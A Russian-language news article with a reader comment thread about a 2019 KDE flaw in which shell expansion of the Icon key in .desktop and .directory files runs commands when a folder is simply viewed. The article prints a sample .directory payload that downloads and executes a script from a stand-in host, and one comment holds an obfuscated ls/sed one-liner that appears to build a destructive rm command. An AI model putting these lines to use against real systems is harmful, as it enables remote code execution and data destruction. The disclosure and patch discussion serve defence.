В KDE выявлена (https://twitter.com/zer0pwn/status/1158433002239746048) уязвимость (https://gist.githubusercontent.com/zeropwn/630832df151029cb8...), позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 (https://kde.org/announcements/kde-frameworks-5.60.0.php) и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен).

Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функию  KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды.  Вопреки спецификации XDG выполнение раскрытия (https://userbase.kde.org/KDE_System_Administration/Configura...) shell-конструкций производится без ограничения типа настроек, т.е. не только при определении командной строки для запуска приложения, но и при указании отображаемых по умолчанию пиктограмм.

Например, для атаки достаточно (https://github.com/RevThreat/KDE-ARBITRARY-CODE-EXECUTION-AU.../) отправить пользователю zip-архив каталогом, содержащим файл ".directory", включающим конструкцию вида:

   [Desktop Entry]
   Type=Directory
   Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

При попытке просмотра содержимого архива в файловом менеджере Dolphin  будет загружен и выполнен скрипт https://example.com/FILENAME.sh.

URL: https://packetstormsecurity.com/files/153874/KDE-4-5-KDeskto...
Новость: https://www.opennet.me/opennews/art.shtml?num=51235

• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:31 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Qwerty, 12:35 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:51 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 16:38 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Вуыкло, 12:54 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,анон, 13:09 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,оралр, 11:32 , 08-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,анон, 12:22 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Голубой гигант, 12:32 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:33 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,otmuenbg, 20:01 , 09-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,sunjob, 19:01 , 10-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:33 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,kamagan, 12:39 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 14:18 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Daemon, 22:43 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 08:17 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:34 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 12:46 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:07 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Sinot, 20:49 , 07-Авг-19
        • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 07:35 , 08-Авг-19
          • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 08:21 , 08-Авг-19
            • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,нех, 15:07 , 08-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 08:29 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:46 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,НяшМяш, 12:53 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 13:17 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 07:36 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:50 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:01 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,anonymous, 18:58 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,anonymous, 21:52 , 09-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:55 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 16:27 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,neAnonim, 22:46 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,anan, 12:58 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 13:06 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:05 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 19:07 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,IronMan, 13:18 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,sunjob, 19:06 , 10-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 13:19 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,iPony129412, 15:34 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:14 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 16:23 , 07-Авг-19
        • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 21:52 , 07-Авг-19
          • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 04:28 , 08-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 16:35 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 13:28 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 16:32 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 18:48 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 19:02 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,neAnonim, 22:51 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 21:51 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Ilya Indigo, 13:35 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:27 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Ilya Indigo, 16:41 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 22:13 , 07-Авг-19
        • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Ilya Indigo, 22:59 , 07-Авг-19
          • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 23:56 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 16:33 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Ilya Indigo, 16:52 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 07:43 , 08-Авг-19
        • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 08:58 , 08-Авг-19
          • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:50 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,AVX, 13:45 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,AVX, 21:19 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 14:01 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 14:57 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 14:04 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,вейланд, 14:22 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 14:39 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 14:48 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 15:44 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,soarin, 16:07 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 15:34 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:17 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:28 , 07-Авг-19
        • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноне, 16:55 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 16:16 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 16:44 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 17:27 , 07-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 18:28 , 07-Авг-19
      • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,InuYasha, 21:22 , 08-Авг-19
        • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 21:44 , 08-Авг-19
          • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,InuYasha, 23:37 , 08-Авг-19
            • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,VINRARUS, 00:50 , 09-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,AlexYeCu_not_logged, 00:20 , 09-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 17:21 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Dmitry77, 08:31 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 18:23 , 07-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Анонимно, 20:26 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,neAnonim, 22:55 , 07-Авг-19
  • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,anonymous, 07:15 , 08-Авг-19
    • Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним 80_уровня, 15:58 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Dmitry77, 08:31 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:26 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Георгий, 12:28 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,InuYasha, 21:26 , 08-Авг-19
• Уязвимость в KDE, позволяющая выполнить код при просмотре сп...,Аноним, 12:26 , 09-Авг-19

Это даже не autorun виндовый, это вообще дырень. Однако не все пользуются kde-шным файловым менеджером и вообще kde.  

Это даже не толстенький троллинг, это вообще жирень.

>Это даже не autorun виндовый

ну почему. Теперь это еще и autorun, еще ближе к захвату десктопов

>>Это даже не autorun виндовый
> ну почему. Теперь это еще и autorun, еще ближе к захвату десктопов

superautorun

От безысходности, ибо больше пользоваться попросту нечем.

kde можно поставить на винду
получим двойной профит

Это говорит о том, что никто даже не думал что эти кеды и кому-то понадобиться взламывать, а следовательно и защищать. Зато пафосные сравнения с вантузом, который 20 лет сопротивляется реальным попыткам взлома.

> 20 лет сопротивляется реальным попыткам взлома

китайские_пионеры.jpg

KDE 3.5.10 из openSUSE 15.1 подвержен?

Да

так проверь там вроде просто для матерого кадешника

подвержены,да, но
- пролечено мгновенно в TDE, после поступления сигнала
- лечится аналогично в старом KDE3 (видимо, вообще бибилотеку не изменяли с тех пор ... а че?! работает - не трогай :o)

kdecore/kconfigbase.cpp

https://mirror.git.trinitydesktop.org/gitea/TDE/tdelibs/pull...

> достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере

в каком? midnight commander? pcmanfm? thunar?

Видимо Dolphin, Krusader и Ark

В любом KDE-шном диалоге открытия файла.

Я предполагаю, что это ошибка не KDE. А Qt в целом.

Неверно предполагаешь. Баг именно в KDE, а не в Qt.

Виндовенько.

Когда это в венде такой примитив был?
Или вот ещё из той же серии.
https://kde.org/info/security/advisory-20180208-2.txt

В вендах разве что конкретно упоролись с автозагрузкой. Когда включили её по умолчанию. Но это была фишка, которую специально сделали, хоть и <я даже не знаю как цензурно это назвать>. С выходом Vista (уже более десяти лет прошло) дошло, что это была плохая идея.

Было пару похожих уязвимостей с ярлыками.

Вроде в Gnome было подобное с превью картинок.

Тсс... Не мешай гномерам ликовать.

Пролистал комменты, что-то как-то не видно ликования гномеров. Фантазии?
А так ничего удивительного в сабже.
Ну и в GNOME само собой разные уязвимости были. И по авторанам, и по всяким превьюшкам. Это тоже естественно, ибо заинтересованность в нём выше.

все просто. гномеры вымерли, ликовать некому.

Да было.
Я о другом - о простоте.

Ну вот почитай это. И где-то с 2010 в Windows чего-то было тоже.
Но везде как-то там серьёзно репу чесали, чтобы буфера так-сяк определёнными байтами переполнять.
https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit...

А тут просто данные в SHELL суёт код, ну и ладно...

Прям пыхом пахнуло. В 2019 году экранирование это всё ещё сложно?

Конечно. В Qt этой функции, наверное, нет из-за сложности реализации. /sarcasm

Просто у них нет npm.

А в гнгме ее просто нет. Как и многого другого.

пификсили вчера еще (в неоне), чел етот редиска канеш, но дырень огромная просто

Интересно, где? https://packaging.neon.kde.org/?s=idle

да, сорян, прост вчера аккурат после новости апдейты секурные какие-то прилетели, толком не смотрел что именно, вот и подумалось, что топик-релейтед

а ващет я все-таки был прав:
https://twitter.com/kdecommunity/status/1159224511499309056
от 7го числа еще пост

ls уязвим? Нет? Ну и ладно.

ls /bin | sed -e '/.ee$/!d' -e '/^.r../!d' -e 's%e%f%' -e 's%$%*%'  -e 's%^%r%' -e 's%e% /%' -e 's%f%m -%'

Так уязвим или чё? Ты вывод ls в sed отправляешь по своему желанию используя заклинание которое я рассмотреть не могу (не говоря уже о том что бы я это смог вбить)

Минимум 11 лет багу

И ведь кто-то наверняка знал!

Ещё в konqueror была, когда он в KDE использовался, по-моему так и не пофиксили до перехода на Dolphin

Тот кто пропатчил под неё KDE

В Тринити будут исправлять?

> В Тринити будут исправлять?

http://www.opennet.me/openforum/vsluhforumID3/118081.html#126

Самое забавное что в каком нибудь лтс кубунте этот баг никогда не исправят и там всегда будет старая багованая версия.

Ну это неправда.
Секурные бэкпорты же есть.

Особенно в дебиане. Нет там ничего.

ну это ложь
https://security-tracker.debian.org/tracker/CVE-2018-6791
Вот как "не была" никогда залатана прошлая крутая дырка в KDE.
Да, там проще было латать, но всё же.

Все таки в дебиане и правда могут забить на это.

Да, да, а ещё завтра Debian может закрыться.
Возможно всё. И естественно, что KDE в Debian пониже приоритетом.
Но всё же думать, что не наложат крохотный патч в "3 files changed, 7 insertions, 51 deletions" для высокого уровня опасной уязвимости глуповато.

> Самое забавное что в каком нибудь лтс кубунте этот баг никогда не исправят и там всегда будет старая багованая версия.

А вот собственно залатка в апстриме https://phabricator.kde.org/D22979
Как видно - ничего особенно сложного. Так что залатают.

>Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ.

Это что за статья????????

-Просто запустил KDE дистр, "перетащил мышью ярлык на рабочий стол или в документ" и получил заражение???

-Загрузил вредоносный desktop-файл от куда??? Вышел в интернет и загрузился сам???

Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.

>Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.

Вы статью читали? Где там про вирус на винде?

>В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ.

Где тут о винде?

>Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory"

Каким нужно быть, чтобы принять файл и не проверить его?

>>Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.
>Вы статью читали? Где там про вирус на винде?

А долго его написать? =D
Я писал о случаях когда накопитель исполюзует по очерёдно и винда и ОС с KDE, и это не токо флешки.

>Каким нужно быть, чтобы принять файл и не проверить его?

Очень занятым человеком. :)

> Каким нужно быть, чтобы принять файл и не проверить его?

Достаточно быть пользователем kde и установить пакет который принесет с собой .desktop

Пришел к тебе человек с уже зараженной флешкой (например в винде или спецом кто постарался), ты ее открыл - радуешься.

Неприятная фича.
К счастью, директории браузер загружать не умеет и прийти такое может только из архива, а Arc-ом открывать архивы безопасно.

Ещё, конечно, из git-а такое может прийти...

Я не знаю есть ли в Плазме Konqueror, но его фишка что это интернет браузер и файловый менеджер в одном флаконе.

> Я не знаю есть ли в Плазме Konqueror, но его фишка что
> это интернет браузер и файловый менеджер в одном флаконе.

Есть.
Файловый менеджер и браузер - это одно и тоже!
Многие путают интернет браузер и браузер, а это разные вещи.

>Многие путают интернет браузер и браузер, а это разные вещи.

Я знаю веб-браузер, а что за браузер в данном контексте?

>>Многие путают интернет браузер и браузер, а это разные вещи.
> Я знаю веб-браузер, а что за браузер в данном контексте?

https://en.wikipedia.org/wiki/Browser
Похоже я и сам ошибался, браузеров (обозревателей) множество, среди них web browser и file browser, also known as a file manager.

Для избежания путаницы следует употреблять: веб-обозреватель (ВО) и файловый менеджер (ФМ).
https://ru.wikipedia.org/wiki/Браузер
https://ru.wikipedia.org/wiki/Файловый_менеджер

Покласть в архив с какими то кистями для фоторедактора - разархивировал и заразился.

> Покласть в архив с какими то кистями для фоторедактора - разархивировал и
> заразился.

Ну это и есть получить из архива.
Но Ваш алгоритм не совсем точен.
Получить архив с кистями --> тупо распаковать его не глядя в дельфине через ПКМ --> заразиться.
Если перед открытием посмотреть что ты собираешься распаковать, хотя бы чтобы посмотреть нужна ли ему субдиректория и сколько он весит, и обнаружить злополучный файл, и или удалить его или распаковать всё кроме него или вообще удалить архив, то заражение не произойдёт.

Я не в коем случае не говорю что это Лёня, напротив, омерзительный пример халатности и рукожопия, но если использовать Arc для проверки архивов, то этого опытный пользователь может избежать, пока не прилетит обновление.

А исправления для openSUSE уже в полёте https://build.opensuse.org/request/show/721476 https://build.opensuse.org/request/show/721478

Чтобы распаковывать архивы, не заглядывая в них, нужно вообще быть альтернативно одаренной личностью.

Ну удачи в заглядывании в tar.gz без распаковки...

Новость не читай
@
Сразу пиши.

Чтобы это сработало, архив нужно открыть как папку в долфине. По умолчанию эта возможность отключена в настройках, и весь просмотр осуществляется через Ark, который показывает содержимое, но не запускает выполнение .desktop-файлов.

Вот же ппц... никогда бы не подумал что так можно обрабатывать путь к картинке... Надо дома протестировать как оно в реальности.  

Посмотрел - по умолчанию dolphin открывает архивы в архиваторе. Но в настройках есть снятая галочка "открывать архивы как папки". Остаётся только смотреть, что распаковываешь, а распаковывать по ПКМ.  

Кто-нибудь пользуется VMware ESX?

Не ставятся на него кеды.

подвержены все у кого установлен файловый менеджер Dolphin?

Любой файловый менеджер на базе kde, а также, если используются kde-шные диалоги открытия/сохранения файлов.

Ну хоть скрипт выполнится из под юзера, не то что гномовоский наутилус, который давал рутовские права. Хотя безрукость конечно на лицо.

> не то что гномовоский наутилус, который давал рутовские права

Что-то не припомню... А что, где, когда?

https://www.opennet.me/opennews/art.shtml?num=49871

> В представленном 3 года назад GVFS-бекенде admin (GNOME Virtual File System) обнаружена уязвимость, позволяющая непривилегированным пользователям, присутствующим в группе wheel, без запроса пароля вносить любые правки в файловую систему с правами root.

Да как-то сабж пострашнее будет.

Че сказать-то хотел?

Что ГНОМ говно. Но тебе виндузятнику такие слова знать не нужно и вообще мозговую активность проявлять не нужно.

Gnome здарового человека это MATE. KDE здарового человека это TDE.

Гноме курильщика после операции это Гноме.

То есть достаточно в архив по мимо интересных пользователю файлов положить этот троянчег в виде desktop файла и вуаля майнер или шпионский модуль загружен?

И эти люди кукарекуют на шиндуз?

То я думаю чо Дельфин так долго запускается, а это его совесть мучит...

Долго запускается? Это на каком древнейшем железе? Специально замерил - на моём старом ThinkPad'e Dolphin запускается чуть больше секунды (1.3). На более современных компах будет ещё быстрее.

FX-8350 4.8 GHz, 16 Gb DDR3 2100 MHz, SSD Crucial MX500.
1+ сек запускается, шо много для ФМ, так как Firefox повторно запускается тоже меньше 2х сек.
А иногда вообще бывают случаи по 5 сек.

отключи всякие фуфлоиндексаторы - и будет скорость.

> отключи всякие фуфлоиндексаторы - и будет скорость.

Это ж какие?

Как минимум - baloo, вроде бы. Смотришь фоновые процессы, читаешь маны, что это такое и гасишь, если лишнее. Я удалил всё подобное при установке ОС на ноут несколько лет назад и с тех пор не вспоминал. А ноут весьма... экономичный %) Но вообще Dolphin и у меня стартует до 5 секунд. Но там ещё влияют всякие шАры, маунты и прочее. И превьюхи, само собой.

> Как минимум - baloo, вроде бы.

Да его я уже даже и не помню когда отключил.

> шАры, маунты и прочее. И превьюхи, само собой.

Превьюхи никак не влияют, я проверил, потомушо обновляются уже после появления окна.
> Но вообще Dolphin и у меня стартует до 5 секунд.

Вот в этом и проблема же, а ты всё "руки помой и будет скорость" ;)

>Долго запускается? Это на каком древнейшем железе?

На любом.
Там что-то навертели в последних релизах, так он даже с ssd может сартовать секунд 8 или 9. Причём не всегда, а после некоторого простоя: после долгого запуска гачинает опять почти мгновенно стартовать. Не запускать некоторое время — может опять длинный запуск быть, а может и не быть. Даже при уже запущенной копии может долгий запуск быть. С чем связано — никто не знает. Сетевые каталоги другую картину дают обычно — запускается сразу, но может «тупить», если они не доступны. Многие пользователи грешили на настройки самбы, но нет. Очищение всевозможных кэшей тоже эффект не дало. В консоли только безуспешные поиски каталога tags:, причём при любом запуске, хоть быстром, хоть медленном. Индексеры и так всегда отключены. Загадка, в общем.
Не начни разраб Nemo косплеить аутиста — свалил бы с Dolphin-а.

Переходите на QubesOS и не парьтесь

А там этого бага нет?

с почином

Линукс безопасен, говорили они...

А потом пришли шифровальщики, .rhost, выполнения кода при взгляде на иконку... популярность пришла. (Когда пользователи начнут еще и платить в стим, а не просто ставить, тогда начнется )

Да вроде бы только ленивый не говорил, что userspace-комбайны -- это бажно и небезопасно.

Где-то нахмурился один Лёня.

Интересно кто является коммитером этого бага?

CVE-2019-14744

Исправлено
https://cgit.kde.org/kconfig.git/commit/?id=5d3e71b1d2ecd2cb...

В версии kconfig 5.61.
https://kde.org/info/security/advisory-20190807-1.txt

Сейчас в KDE Neon еще 5.60. Не знаю, есть ли там этот патч в текущей сборке.

Вот к чему приводит тяга к копанию в контенте вместо его отображения!
А вы удивляетесь, почему современные фэйл-менеджеры такие торомзные!
Отрубить нахрен все превьюхи. Хотя, конечно, даже в имени файла может закрасться эксплоит (по-моему, такое было в макоси или подобном).

Давайте попробуем разобраться без злорадства.

> Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функцию KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды.

Эта проблема не частный случай касающийся конкретного куска KDE. Это вообще проблема взаимоотношения DE и оболочки. Сегодня (10 лет назад) на этом споткнулся один разраб, а завтра споткнётся другой. Чтобы обратиться к ресурсному файлу (Icon - явно ресурс) необходимо открыть файл на чтение и прочитать данные +/- какое-то смещение. А тут не просто выполнением занимаются, тут ради иконки запустили целую оболочку! Подумайте, как просто разработчику добраться из графики в оболочку и совершить похожую ошибку.

Тут уже многие писали, что в венде были похожие уязвимости. Я же скажу что этот архитектурный недочет был внутри Win9x. Надо полностью отлучать графику от оболочки. Нужно, чтобы для работы графических API нужно было явно создавать новые экземпляры оболочки, если разработчик хочет запустить скрипт. И тут важно понять разницу между "запустить файл оболочки" и проинстанцировать. В первом случае для запуска оболочки требуется оболочка, а во втором случае создаётся экземпляр оболочки.

Когда оболочку решили убрать из системы инициализации... до сих пор вонь повсюду. А представьте если отлучить её от приложений и целиком завернуть в API... это уже Linux NT какой-то.